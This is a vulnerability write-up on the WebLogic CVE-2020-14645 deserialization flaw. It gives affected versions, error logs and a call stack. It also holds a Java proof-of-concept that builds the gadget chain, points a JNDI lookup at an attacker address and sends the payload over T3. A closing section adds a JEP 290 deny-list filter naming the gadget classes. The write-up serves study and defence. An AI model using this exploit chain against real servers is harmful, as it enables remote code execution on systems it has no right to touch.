The impact is fairly limited, since not many deployments run 12.2.1.4.
Affected versions:
- Weblogic 12.2.1.4.x: the chain relies on com.tangosol.util.extractor.UniversalExtractor, a class specific to the Coherence component shipped with Weblogic 12.2.1.4.0, so only Weblogic 12.2.1.4.x is affected.
- JDK < 6u211/7u201/8u191: since the sink is JNDI injection, only JDK versions before JEP 290 are affected.
Demo
Weblogic error output:
(Wrapped: com.sun.rowset.JdbcRowSetImpl.databaseMetaData(com.sun.rowset.JdbcRowSetImpl@6e9f27dc)) java.lang.reflect.InvocationTargetException
at com.tangosol.util.Base.ensureRuntimeException(Base.java:324)
at com.tangosol.util.extractor.UniversalExtractor.extract(UniversalExtractor.java:183)
at com.tangosol.util.comparator.ExtractorComparator.compare(ExtractorComparator.java:71)
at java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:722)
at java.util.PriorityQueue.siftDown(PriorityQueue.java:688)
Truncated. see log file for complete stacktrace
Caused By: java.lang.reflect.InvocationTargetException
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at com.tangosol.util.extractor.UniversalExtractor.extractComplex(UniversalExtractor.java:432)
Truncated. see log file for complete stacktrace
Caused By: java.sql.SQLException: JdbcRowSet (连接) JNDI 无法连接
at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634)
at com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData(JdbcRowSetImpl.java:4004)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
Truncated. see log file for complete stacktrace
PoC:
    import com.sun.rowset.JdbcRowSetImpl;
    import com.tangosol.util.comparator.ExtractorComparator;
    import com.tangosol.util.extractor.UniversalExtractor;
    import java.lang.reflect.Field;
    import java.util.PriorityQueue;

    // rmiAddress, target, Port and SSL, as well as the Reflections, Serializables and
    // T3ProtocolOperation helpers, are defined outside this snippet (they come from
    // the exploit tooling it was taken from and are not shown on this page).

    // UniversalExtractor.extract() reflectively invokes the named method on the object it is given.
    UniversalExtractor universalExtractor = new UniversalExtractor("getDatabaseMetaData()");
    // JdbcRowSetImpl.getDatabaseMetaData() calls connect(), which does a JNDI lookup of the dataSource field.
    JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
    Class clazz1 = JdbcRowSetImpl.class.getSuperclass(); // the dataSource field is declared in BaseRowSet
    Field dataSource = clazz1.getDeclaredField("dataSource");
    dataSource.setAccessible(true);
    dataSource.set(jdbcRowSet, rmiAddress);
    // PriorityQueue.readObject() -> heapify() -> comparator.compare(), which drives the extractor.
    ExtractorComparator extractorComparator = new ExtractorComparator(universalExtractor);
    PriorityQueue queue = new PriorityQueue(2);
    queue.add("1");
    queue.add("1");
    Class ext = PriorityQueue.class;
    Field comparator = ext.getDeclaredField("comparator");
    comparator.setAccessible(true);
    comparator.set(queue, extractorComparator);
    // Replace the first heap element with the JdbcRowSetImpl so compare() is invoked on it.
    Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
    queueArray[0] = jdbcRowSet;
    byte[] payload = Serializables.serialize(queue);
    T3ProtocolOperation.send(target, Port, SSL, payload);
The call stack is:
getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
extractComplex:432, UniversalExtractor (com.tangosol.util.extractor)
extract:175, UniversalExtractor (com.tangosol.util.extractor)
compare:71, ExtractorComparator (com.tangosol.util.comparator)
siftDownUsingComparator:722, PriorityQueue (java.util)
siftDown:688, PriorityQueue (java.util)
heapify:737, PriorityQueue (java.util)
readObject:797, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1158, ObjectStreamClass (java.io)
readSerialData:2176, ObjectInputStream (java.io)
readOrdinaryObject:2067, ObjectInputStream (java.io)
readObject0:1571, ObjectInputStream (java.io)
readObject:431, ObjectInputStream (java.io)
readObject:73, InboundMsgAbbrev (weblogic.rjvm)
read:45, InboundMsgAbbrev (weblogic.rjvm)
readMsgAbbrevs:325, MsgAbbrevJVMConnection (weblogic.rjvm)
init:219, MsgAbbrevInputStream (weblogic.rjvm)
dispatch:557, MsgAbbrevJVMConnection (weblogic.rjvm)
dispatch:666, MuxableSocketT3 (weblogic.rjvm.t3)
dispatch:397, BaseAbstractMuxableSocket (weblogic.socket)
readReadySocketOnce:993, SocketMuxer (weblogic.socket)
readReadySocket:929, SocketMuxer (weblogic.socket)
process:599, NIOSocketMuxer (weblogic.socket)
processSockets:563, NIOSocketMuxer (weblogic.socket)
run:30, SocketReaderRequest (weblogic.socket)
execute:43, SocketReaderRequest (weblogic.socket)
execute:147, ExecuteThread (weblogic.kernel)
run:119, ExecuteThread (weblogic.kernel)
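Every class on the chain above (UniversalExtractor, ExtractorComparator, JdbcRowSetImpl) has to pass through ObjectInputStream before PriorityQueue.readObject() runs, so a JEP 290 serialization filter can stop it at that boundary. The following is an added example, not code from this post or from the referenced repositories; it assumes JDK 9+ (java.io.ObjectInputFilter) and the JDK reference rowset implementation, whose RowSetProvider returns com.sun.rowset.JdbcRowSetImpl.

```java
import java.io.*;
import java.util.PriorityQueue;
import javax.sql.rowset.JdbcRowSet;
import javax.sql.rowset.RowSetProvider;

public class GadgetFilterDemo {
    // Deny list for the classes on the CVE-2020-14645 chain plus a nesting limit.
    // JEP 290 pattern syntax: "!" rejects, "**" matches a package and its subpackages,
    // and "maxdepth" bounds the object graph depth.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
        "!com.tangosol.util.extractor.**;"
      + "!com.tangosol.util.comparator.**;"
      + "!com.sun.rowset.**;"
      + "maxdepth=10");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Returns true if the stream deserialized, false if the filter rejected a class in it.
    static boolean tryDeserialize(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.setObjectInputFilter(FILTER);
            ois.readObject();
            return true;
        } catch (InvalidClassException rejected) {
            // A REJECTED filter status surfaces as InvalidClassException("filter status: REJECTED").
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed benign input: a plain PriorityQueue of strings is still accepted.
        PriorityQueue<String> benign = new PriorityQueue<>();
        benign.add("1");
        benign.add("2");
        System.out.println("benign PriorityQueue accepted: " + tryDeserialize(serialize(benign)));

        // The class the gadget smuggles into the queue's backing array is rejected on sight,
        // before any readObject() on the queue could reach the comparator.
        JdbcRowSet rowSet = RowSetProvider.newFactory().createJdbcRowSet();
        System.out.println("JdbcRowSetImpl accepted: " + tryDeserialize(serialize(rowSet)));
    }
}
```

The same pattern string can be applied process-wide through the jdk.serialFilter system property instead of per stream.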
References
- https://www.cnblogs.com/potatsoSec/p/13307315.html
- https://www.anquanke.com/post/id/210724
- https://github.com/Y4er/CVE-2020-14645
- https://github.com/DaBoQuan/CVE-2020-14645